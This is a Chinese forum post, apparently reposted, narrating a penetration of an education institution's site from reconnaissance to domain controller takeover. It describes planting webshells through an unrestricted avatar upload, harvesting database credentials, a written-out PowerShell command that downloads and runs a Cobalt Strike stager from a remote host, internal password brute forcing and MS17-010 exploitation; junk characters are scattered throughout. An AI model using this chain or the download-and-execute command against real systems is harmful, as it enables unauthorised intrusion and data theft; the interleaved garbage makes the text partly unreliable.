|
, x+ L1 n. I" ~9 i! f" j 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路/ |4 d) U: M2 ~& |3 J! v
* C4 Q2 W) b- V
: } i$ a. t6 z3 L R
0 h/ r* a1 m9 i' |4 J8 G: k + G( ^9 |* P! G* Z$ h
* U6 N t P% K# j 正文/ J! |6 ^9 b. C) p
: ~7 G, ]$ X: Y' s1 e
1 A& V7 [! r% C2 M. b+ I# `) Y( ~ ' G" P! M, N! j% a. p
9 ]0 Z0 s$ u! l: m' I
% @1 Z' F% a+ [: e% d
目标:www.xxxx.com(一家教育机构)
( b5 R: }* L: M# p6 b
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能6 F/ X, Y) r; [
" H7 j% o7 _/ ?
- ^. N. C' C/ m% E
4 k! R8 B* z& f( ~) E7 `1 H/ s
5 c2 A: m5 x3 x& P
- U8 Q; b( t6 A7 G5 z7 u6 ~7 S4 } 进行了简单的信息搜集
: |3 a4 A6 j v, `
0 ]& O0 }4 O" ^6 c8 c
' C) k+ A* |, Q0 E) L) \, t5 x
2 [7 r7 b% z, [5 h$ o' b' Q' W& j5 S
& X0 \4 C! ?/ Z+ t 子域名搜集8 O9 p# @+ U+ N# m1 l- x
6 T( w+ X3 S" N* L9 ~! d) t: O& o" Q3 J1 X( b
2 p4 g6 j0 _( n5 t
' d) W$ J. z% R! I6 A, b& E/ n/ C7 R1 `$ n3 G/ E3 C4 n1 o
fofa找资产
8 m6 R1 c8 ~' t9 I
" O2 }/ |0 |( h
1 X5 g' i$ w: H, X9 ?
" y# Y. v+ J# V' r! O b2 R
* T& T4 ]1 R( Z6 ~) K/ P  : @6 R! J! ^% X+ P6 K* o
4 Q G2 Q5 O" n: V+ w$ q$ F' t, a! b A3 Q/ V+ f C3 C
一共七个资产。去重之后只有两个。
; E3 f% D* l7 @2 ^
4 ^0 q6 p; `) ?0 Q
) E' M! l' z& j: s+ z* A9 a + G6 e- `) r G, X2 ?
2 E! Z6 |/ B3 M3 |4 M5 g 目录探测: }& Q" J) e8 Z, B4 p
( M9 L r% \ [8 e
6 k& Z& b1 O7 g( J
7 r0 R2 M1 c. a* O$ F- L. x
~; P: j! b4 I1 H1 \% G3 x/ p. {6 ]1 o& U2 `% e7 L+ M0 s$ S
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
0 @/ V) k9 J1 X- ~9 Q1 ~
3 g) w" H$ t }0 b$ u
" `: g* G; R- p" L" q
$ I5 Q) X6 `2 `; _% g# i) T J* `- w1 |, \
我又尝试了通过修改返回包来绕过登录界面* O% ~2 d# N0 x
, W/ D, B3 h* g/ Y$ J- e
6 v+ m: Z( E8 O5 g& ~
 ' y' {8 {: N; N3 m) v
# B( @8 _8 h2 p, T, J: x0 o _7 u/ Z9 i
还是不行,尝试注入无果2 t9 U& X, ^0 Q7 n
: N9 B3 g$ Y; N+ U3 O/ T
- V/ R- H- a7 t6 h) [& R; X  7 ~+ A, n1 T5 u& S# O8 g" i) T) c
& `* h; k* M* i" g9 i2 ?
( Y& U: ?: Q# p 不过我目录探测出了一处Spring信息泄露
. ~! E6 E" v0 ?- u( n* M
6 e, J/ f2 a" J
7 e2 p0 Z& i( l: I0 Q: H 9 k' B$ k z+ x9 H
d/ P& D* g- j6 p 
' m' c3 ]! Z. Z# N0 P6 j) i ' a' J# y6 v; V8 ~
" i+ |5 a' u! a+ D9 C6 s& ^' b 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录# r1 J. Y8 p' u& r
1 E: m2 D6 v& `6 J% s2 }4 F
! @% {! G3 ` _' @
# H; v7 _) k K" d1 N; b+ q ( G( Y& S1 V5 @% K3 c
5 o! Y' Z' x- ^/ k8 ] 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。7 o4 F: r- v0 K
* m; {7 j7 g; q9 F: C8 H! w, M& t$ b# Z" R) t" M
4 W' y1 j/ I" ~& T
1 w" S* Q% f3 o, H7 [& Q* B
+ T+ W3 C9 Q" e4 Q5 w; \& B, N1 g 获取有些师傅到这一步就手机抓包电脑测了。6 \4 S3 X, [% {% G4 l" L$ F
; ~& v# V& Q- j6 G5 R: }, r% w' A- D+ t# G* ~
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。7 r/ t2 s) D w6 g
% T1 C# z5 M: T/ Q( O) k
( v+ G/ }/ ]* y F/ ~* P. L" d 其中在一个公众号发现了小程序,可以进行注册。1 v, R& H5 F: V. L, ], l& M
7 c( @, \& K* I! `$ l, J
5 g) ^( N/ Q# A( b 看到了头像上传,尝试上传获取WebShell- }7 X7 ~0 R1 q0 k4 F; A' [
+ r3 I- \6 @5 f
% E; |- E7 Y. ^" q  , I# s/ w! N8 W$ n# M0 y
# g0 R; f9 l# N
( H* ~1 g: Y. I7 ^0 Y: ?" n: h9 \ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
8 x; H4 f+ |/ l" f& J 6 B; U4 \1 L% Q9 H8 c
- B$ u& w1 J: T: n0 e
 + s- S0 _8 X2 S g* t8 {- Q8 L* a! t
' U. s5 O: S3 |- I
: C4 Y4 o* Q3 T 然后上了大马
2 s: T: B8 l+ J$ r& Q( C7 Q, r0 W " I' \+ f# T6 l9 T' s
% t' A2 B+ o% B$ D! J) D
 ) k9 C& h7 e/ I$ k' S6 W5 S# [
" Y( N1 @" }; T' [" R
2 `% B3 K3 _1 ^! M. M% M& I6 s
, g- n$ J7 Y0 Z9 q4 n
8 ^4 B3 C& N9 X. J+ k' U1 a( g* M3 b
通过翻找文件发现数据库账号密码
H- K' L3 r3 K: P7 [: y
. c/ S. u. n5 g
# @3 q* ]- O7 |1 S) n L+ I 
r0 ?9 g6 N9 F4 `0 z" K" s 2 c- }/ C# j' `' e
& z( w4 m& f. U- s- l
--内网渗透
8 R" C! D+ {, ]% B, F( @- _
# R" l# H* ?5 {( \1 Y9 W
0 ]- V8 ~, o8 O* s* ?6 E* T 直接通过powershell执行 cs上线
6 E. i$ { w7 ^, H# a5 V 2 e' i7 w# U; L8 `: G! X. `
( q& f$ K5 H+ P powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"( W" E# j! P. W8 i. N
6 a& R$ X& \2 E P
6 X# i/ m- A6 d6 {
" i: Z' z+ h# O! ^* k+ Q
# R( }: d2 m& s1 y
( Q! a( k$ z9 p- m2 w- p; o: W 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
" w6 Q; K. y% D" E2 D5 p
" e0 T! i% r6 r2 s7 R
: E+ J/ n% N/ o. \1 F9 ?+ {  X! K# W& J9 k: a5 i
. R, B- N( A( V9 M% T: v
2 G n8 g3 }% q0 w
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% \( ?/ M& `0 b) {+ K
" I2 g8 }4 R5 ^' y P) {8 r
7 r4 O1 T$ i: U9 A1 b: ~8 {8 i6 l& K# s7 d
" |! H- `% H) i/ b1 K# O) e! ?
& [5 ]$ }" q) i  5 P: r+ ~5 z& t; e4 k# s& b
% @, D" @7 D9 Z( U* y1 j
! H) A3 j6 `# K/ z" `
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
% K& c* j( @' v, s* I3 X
+ r9 w) _7 Q- V) Q G. {# c& v- ?
( M2 a/ _: o% u3 ]
: D' ?' }' j |0 {) j
7 M$ N; S: A. X0 t# i3 H0 g4 D* g  " e' w9 A3 T {/ l4 E S( g
! f1 i* f0 R& ~+ l0 q! {+ e/ l! L ^) u7 b
; F* z5 {' ?0 |2 \4 J
+ o) y, s8 j# s3 p% G7 o
, [" \; m# i- Q3 J$ K: }+ c% N& z
+ i) @/ l7 K5 k( E P
# j0 S, z) b, d) Z9 g
' ~& p: o8 x8 e+ ?7 k* v9 s( s' p
6 D D& K7 F; I
; s3 S2 C0 _2 Z: R# g% t- t4 x 小结. x7 ^/ U3 P0 V7 t, `
7 v* c& u0 l1 k8 Q: X
. Z9 y# P# i, C1 L
/ f( k1 X( c& T1 |
9 ?4 O2 t+ e0 m( h7 P" x( t3 Y0 y( K! k v/ ?0 R
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
$ V$ p- K+ {: E* S# K2 H
6 E$ O1 }, k) s
% j* g% j. q) q4 s
+ O* ^! f0 j# _( P+ i 1 Z% L3 `1 w" i0 q4 j5 J9 p) g
/ ]: Y: ^& f$ L$ i - ( M4 \/ a" F. ]' K0 x" r
- C6 j5 e& H1 [- `
! T# S& x; K9 G5 N3 S - 3 y! F* \8 j7 k# `6 A8 [0 J
6 D0 j* _% v+ M+ y! [: H* [
" e( O5 p5 z& E & ?/ m E4 m) d, N/ Q
1 a: D* _1 i- Y i3 C 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html z; n" \4 L* K# X' M$ I% Y7 {) m
; [/ v1 d( X+ J1 a: A
" o; \" N6 r& a 5 P7 s5 q4 q% U9 u% o
| 
发表于 2024-3-1 19:41:32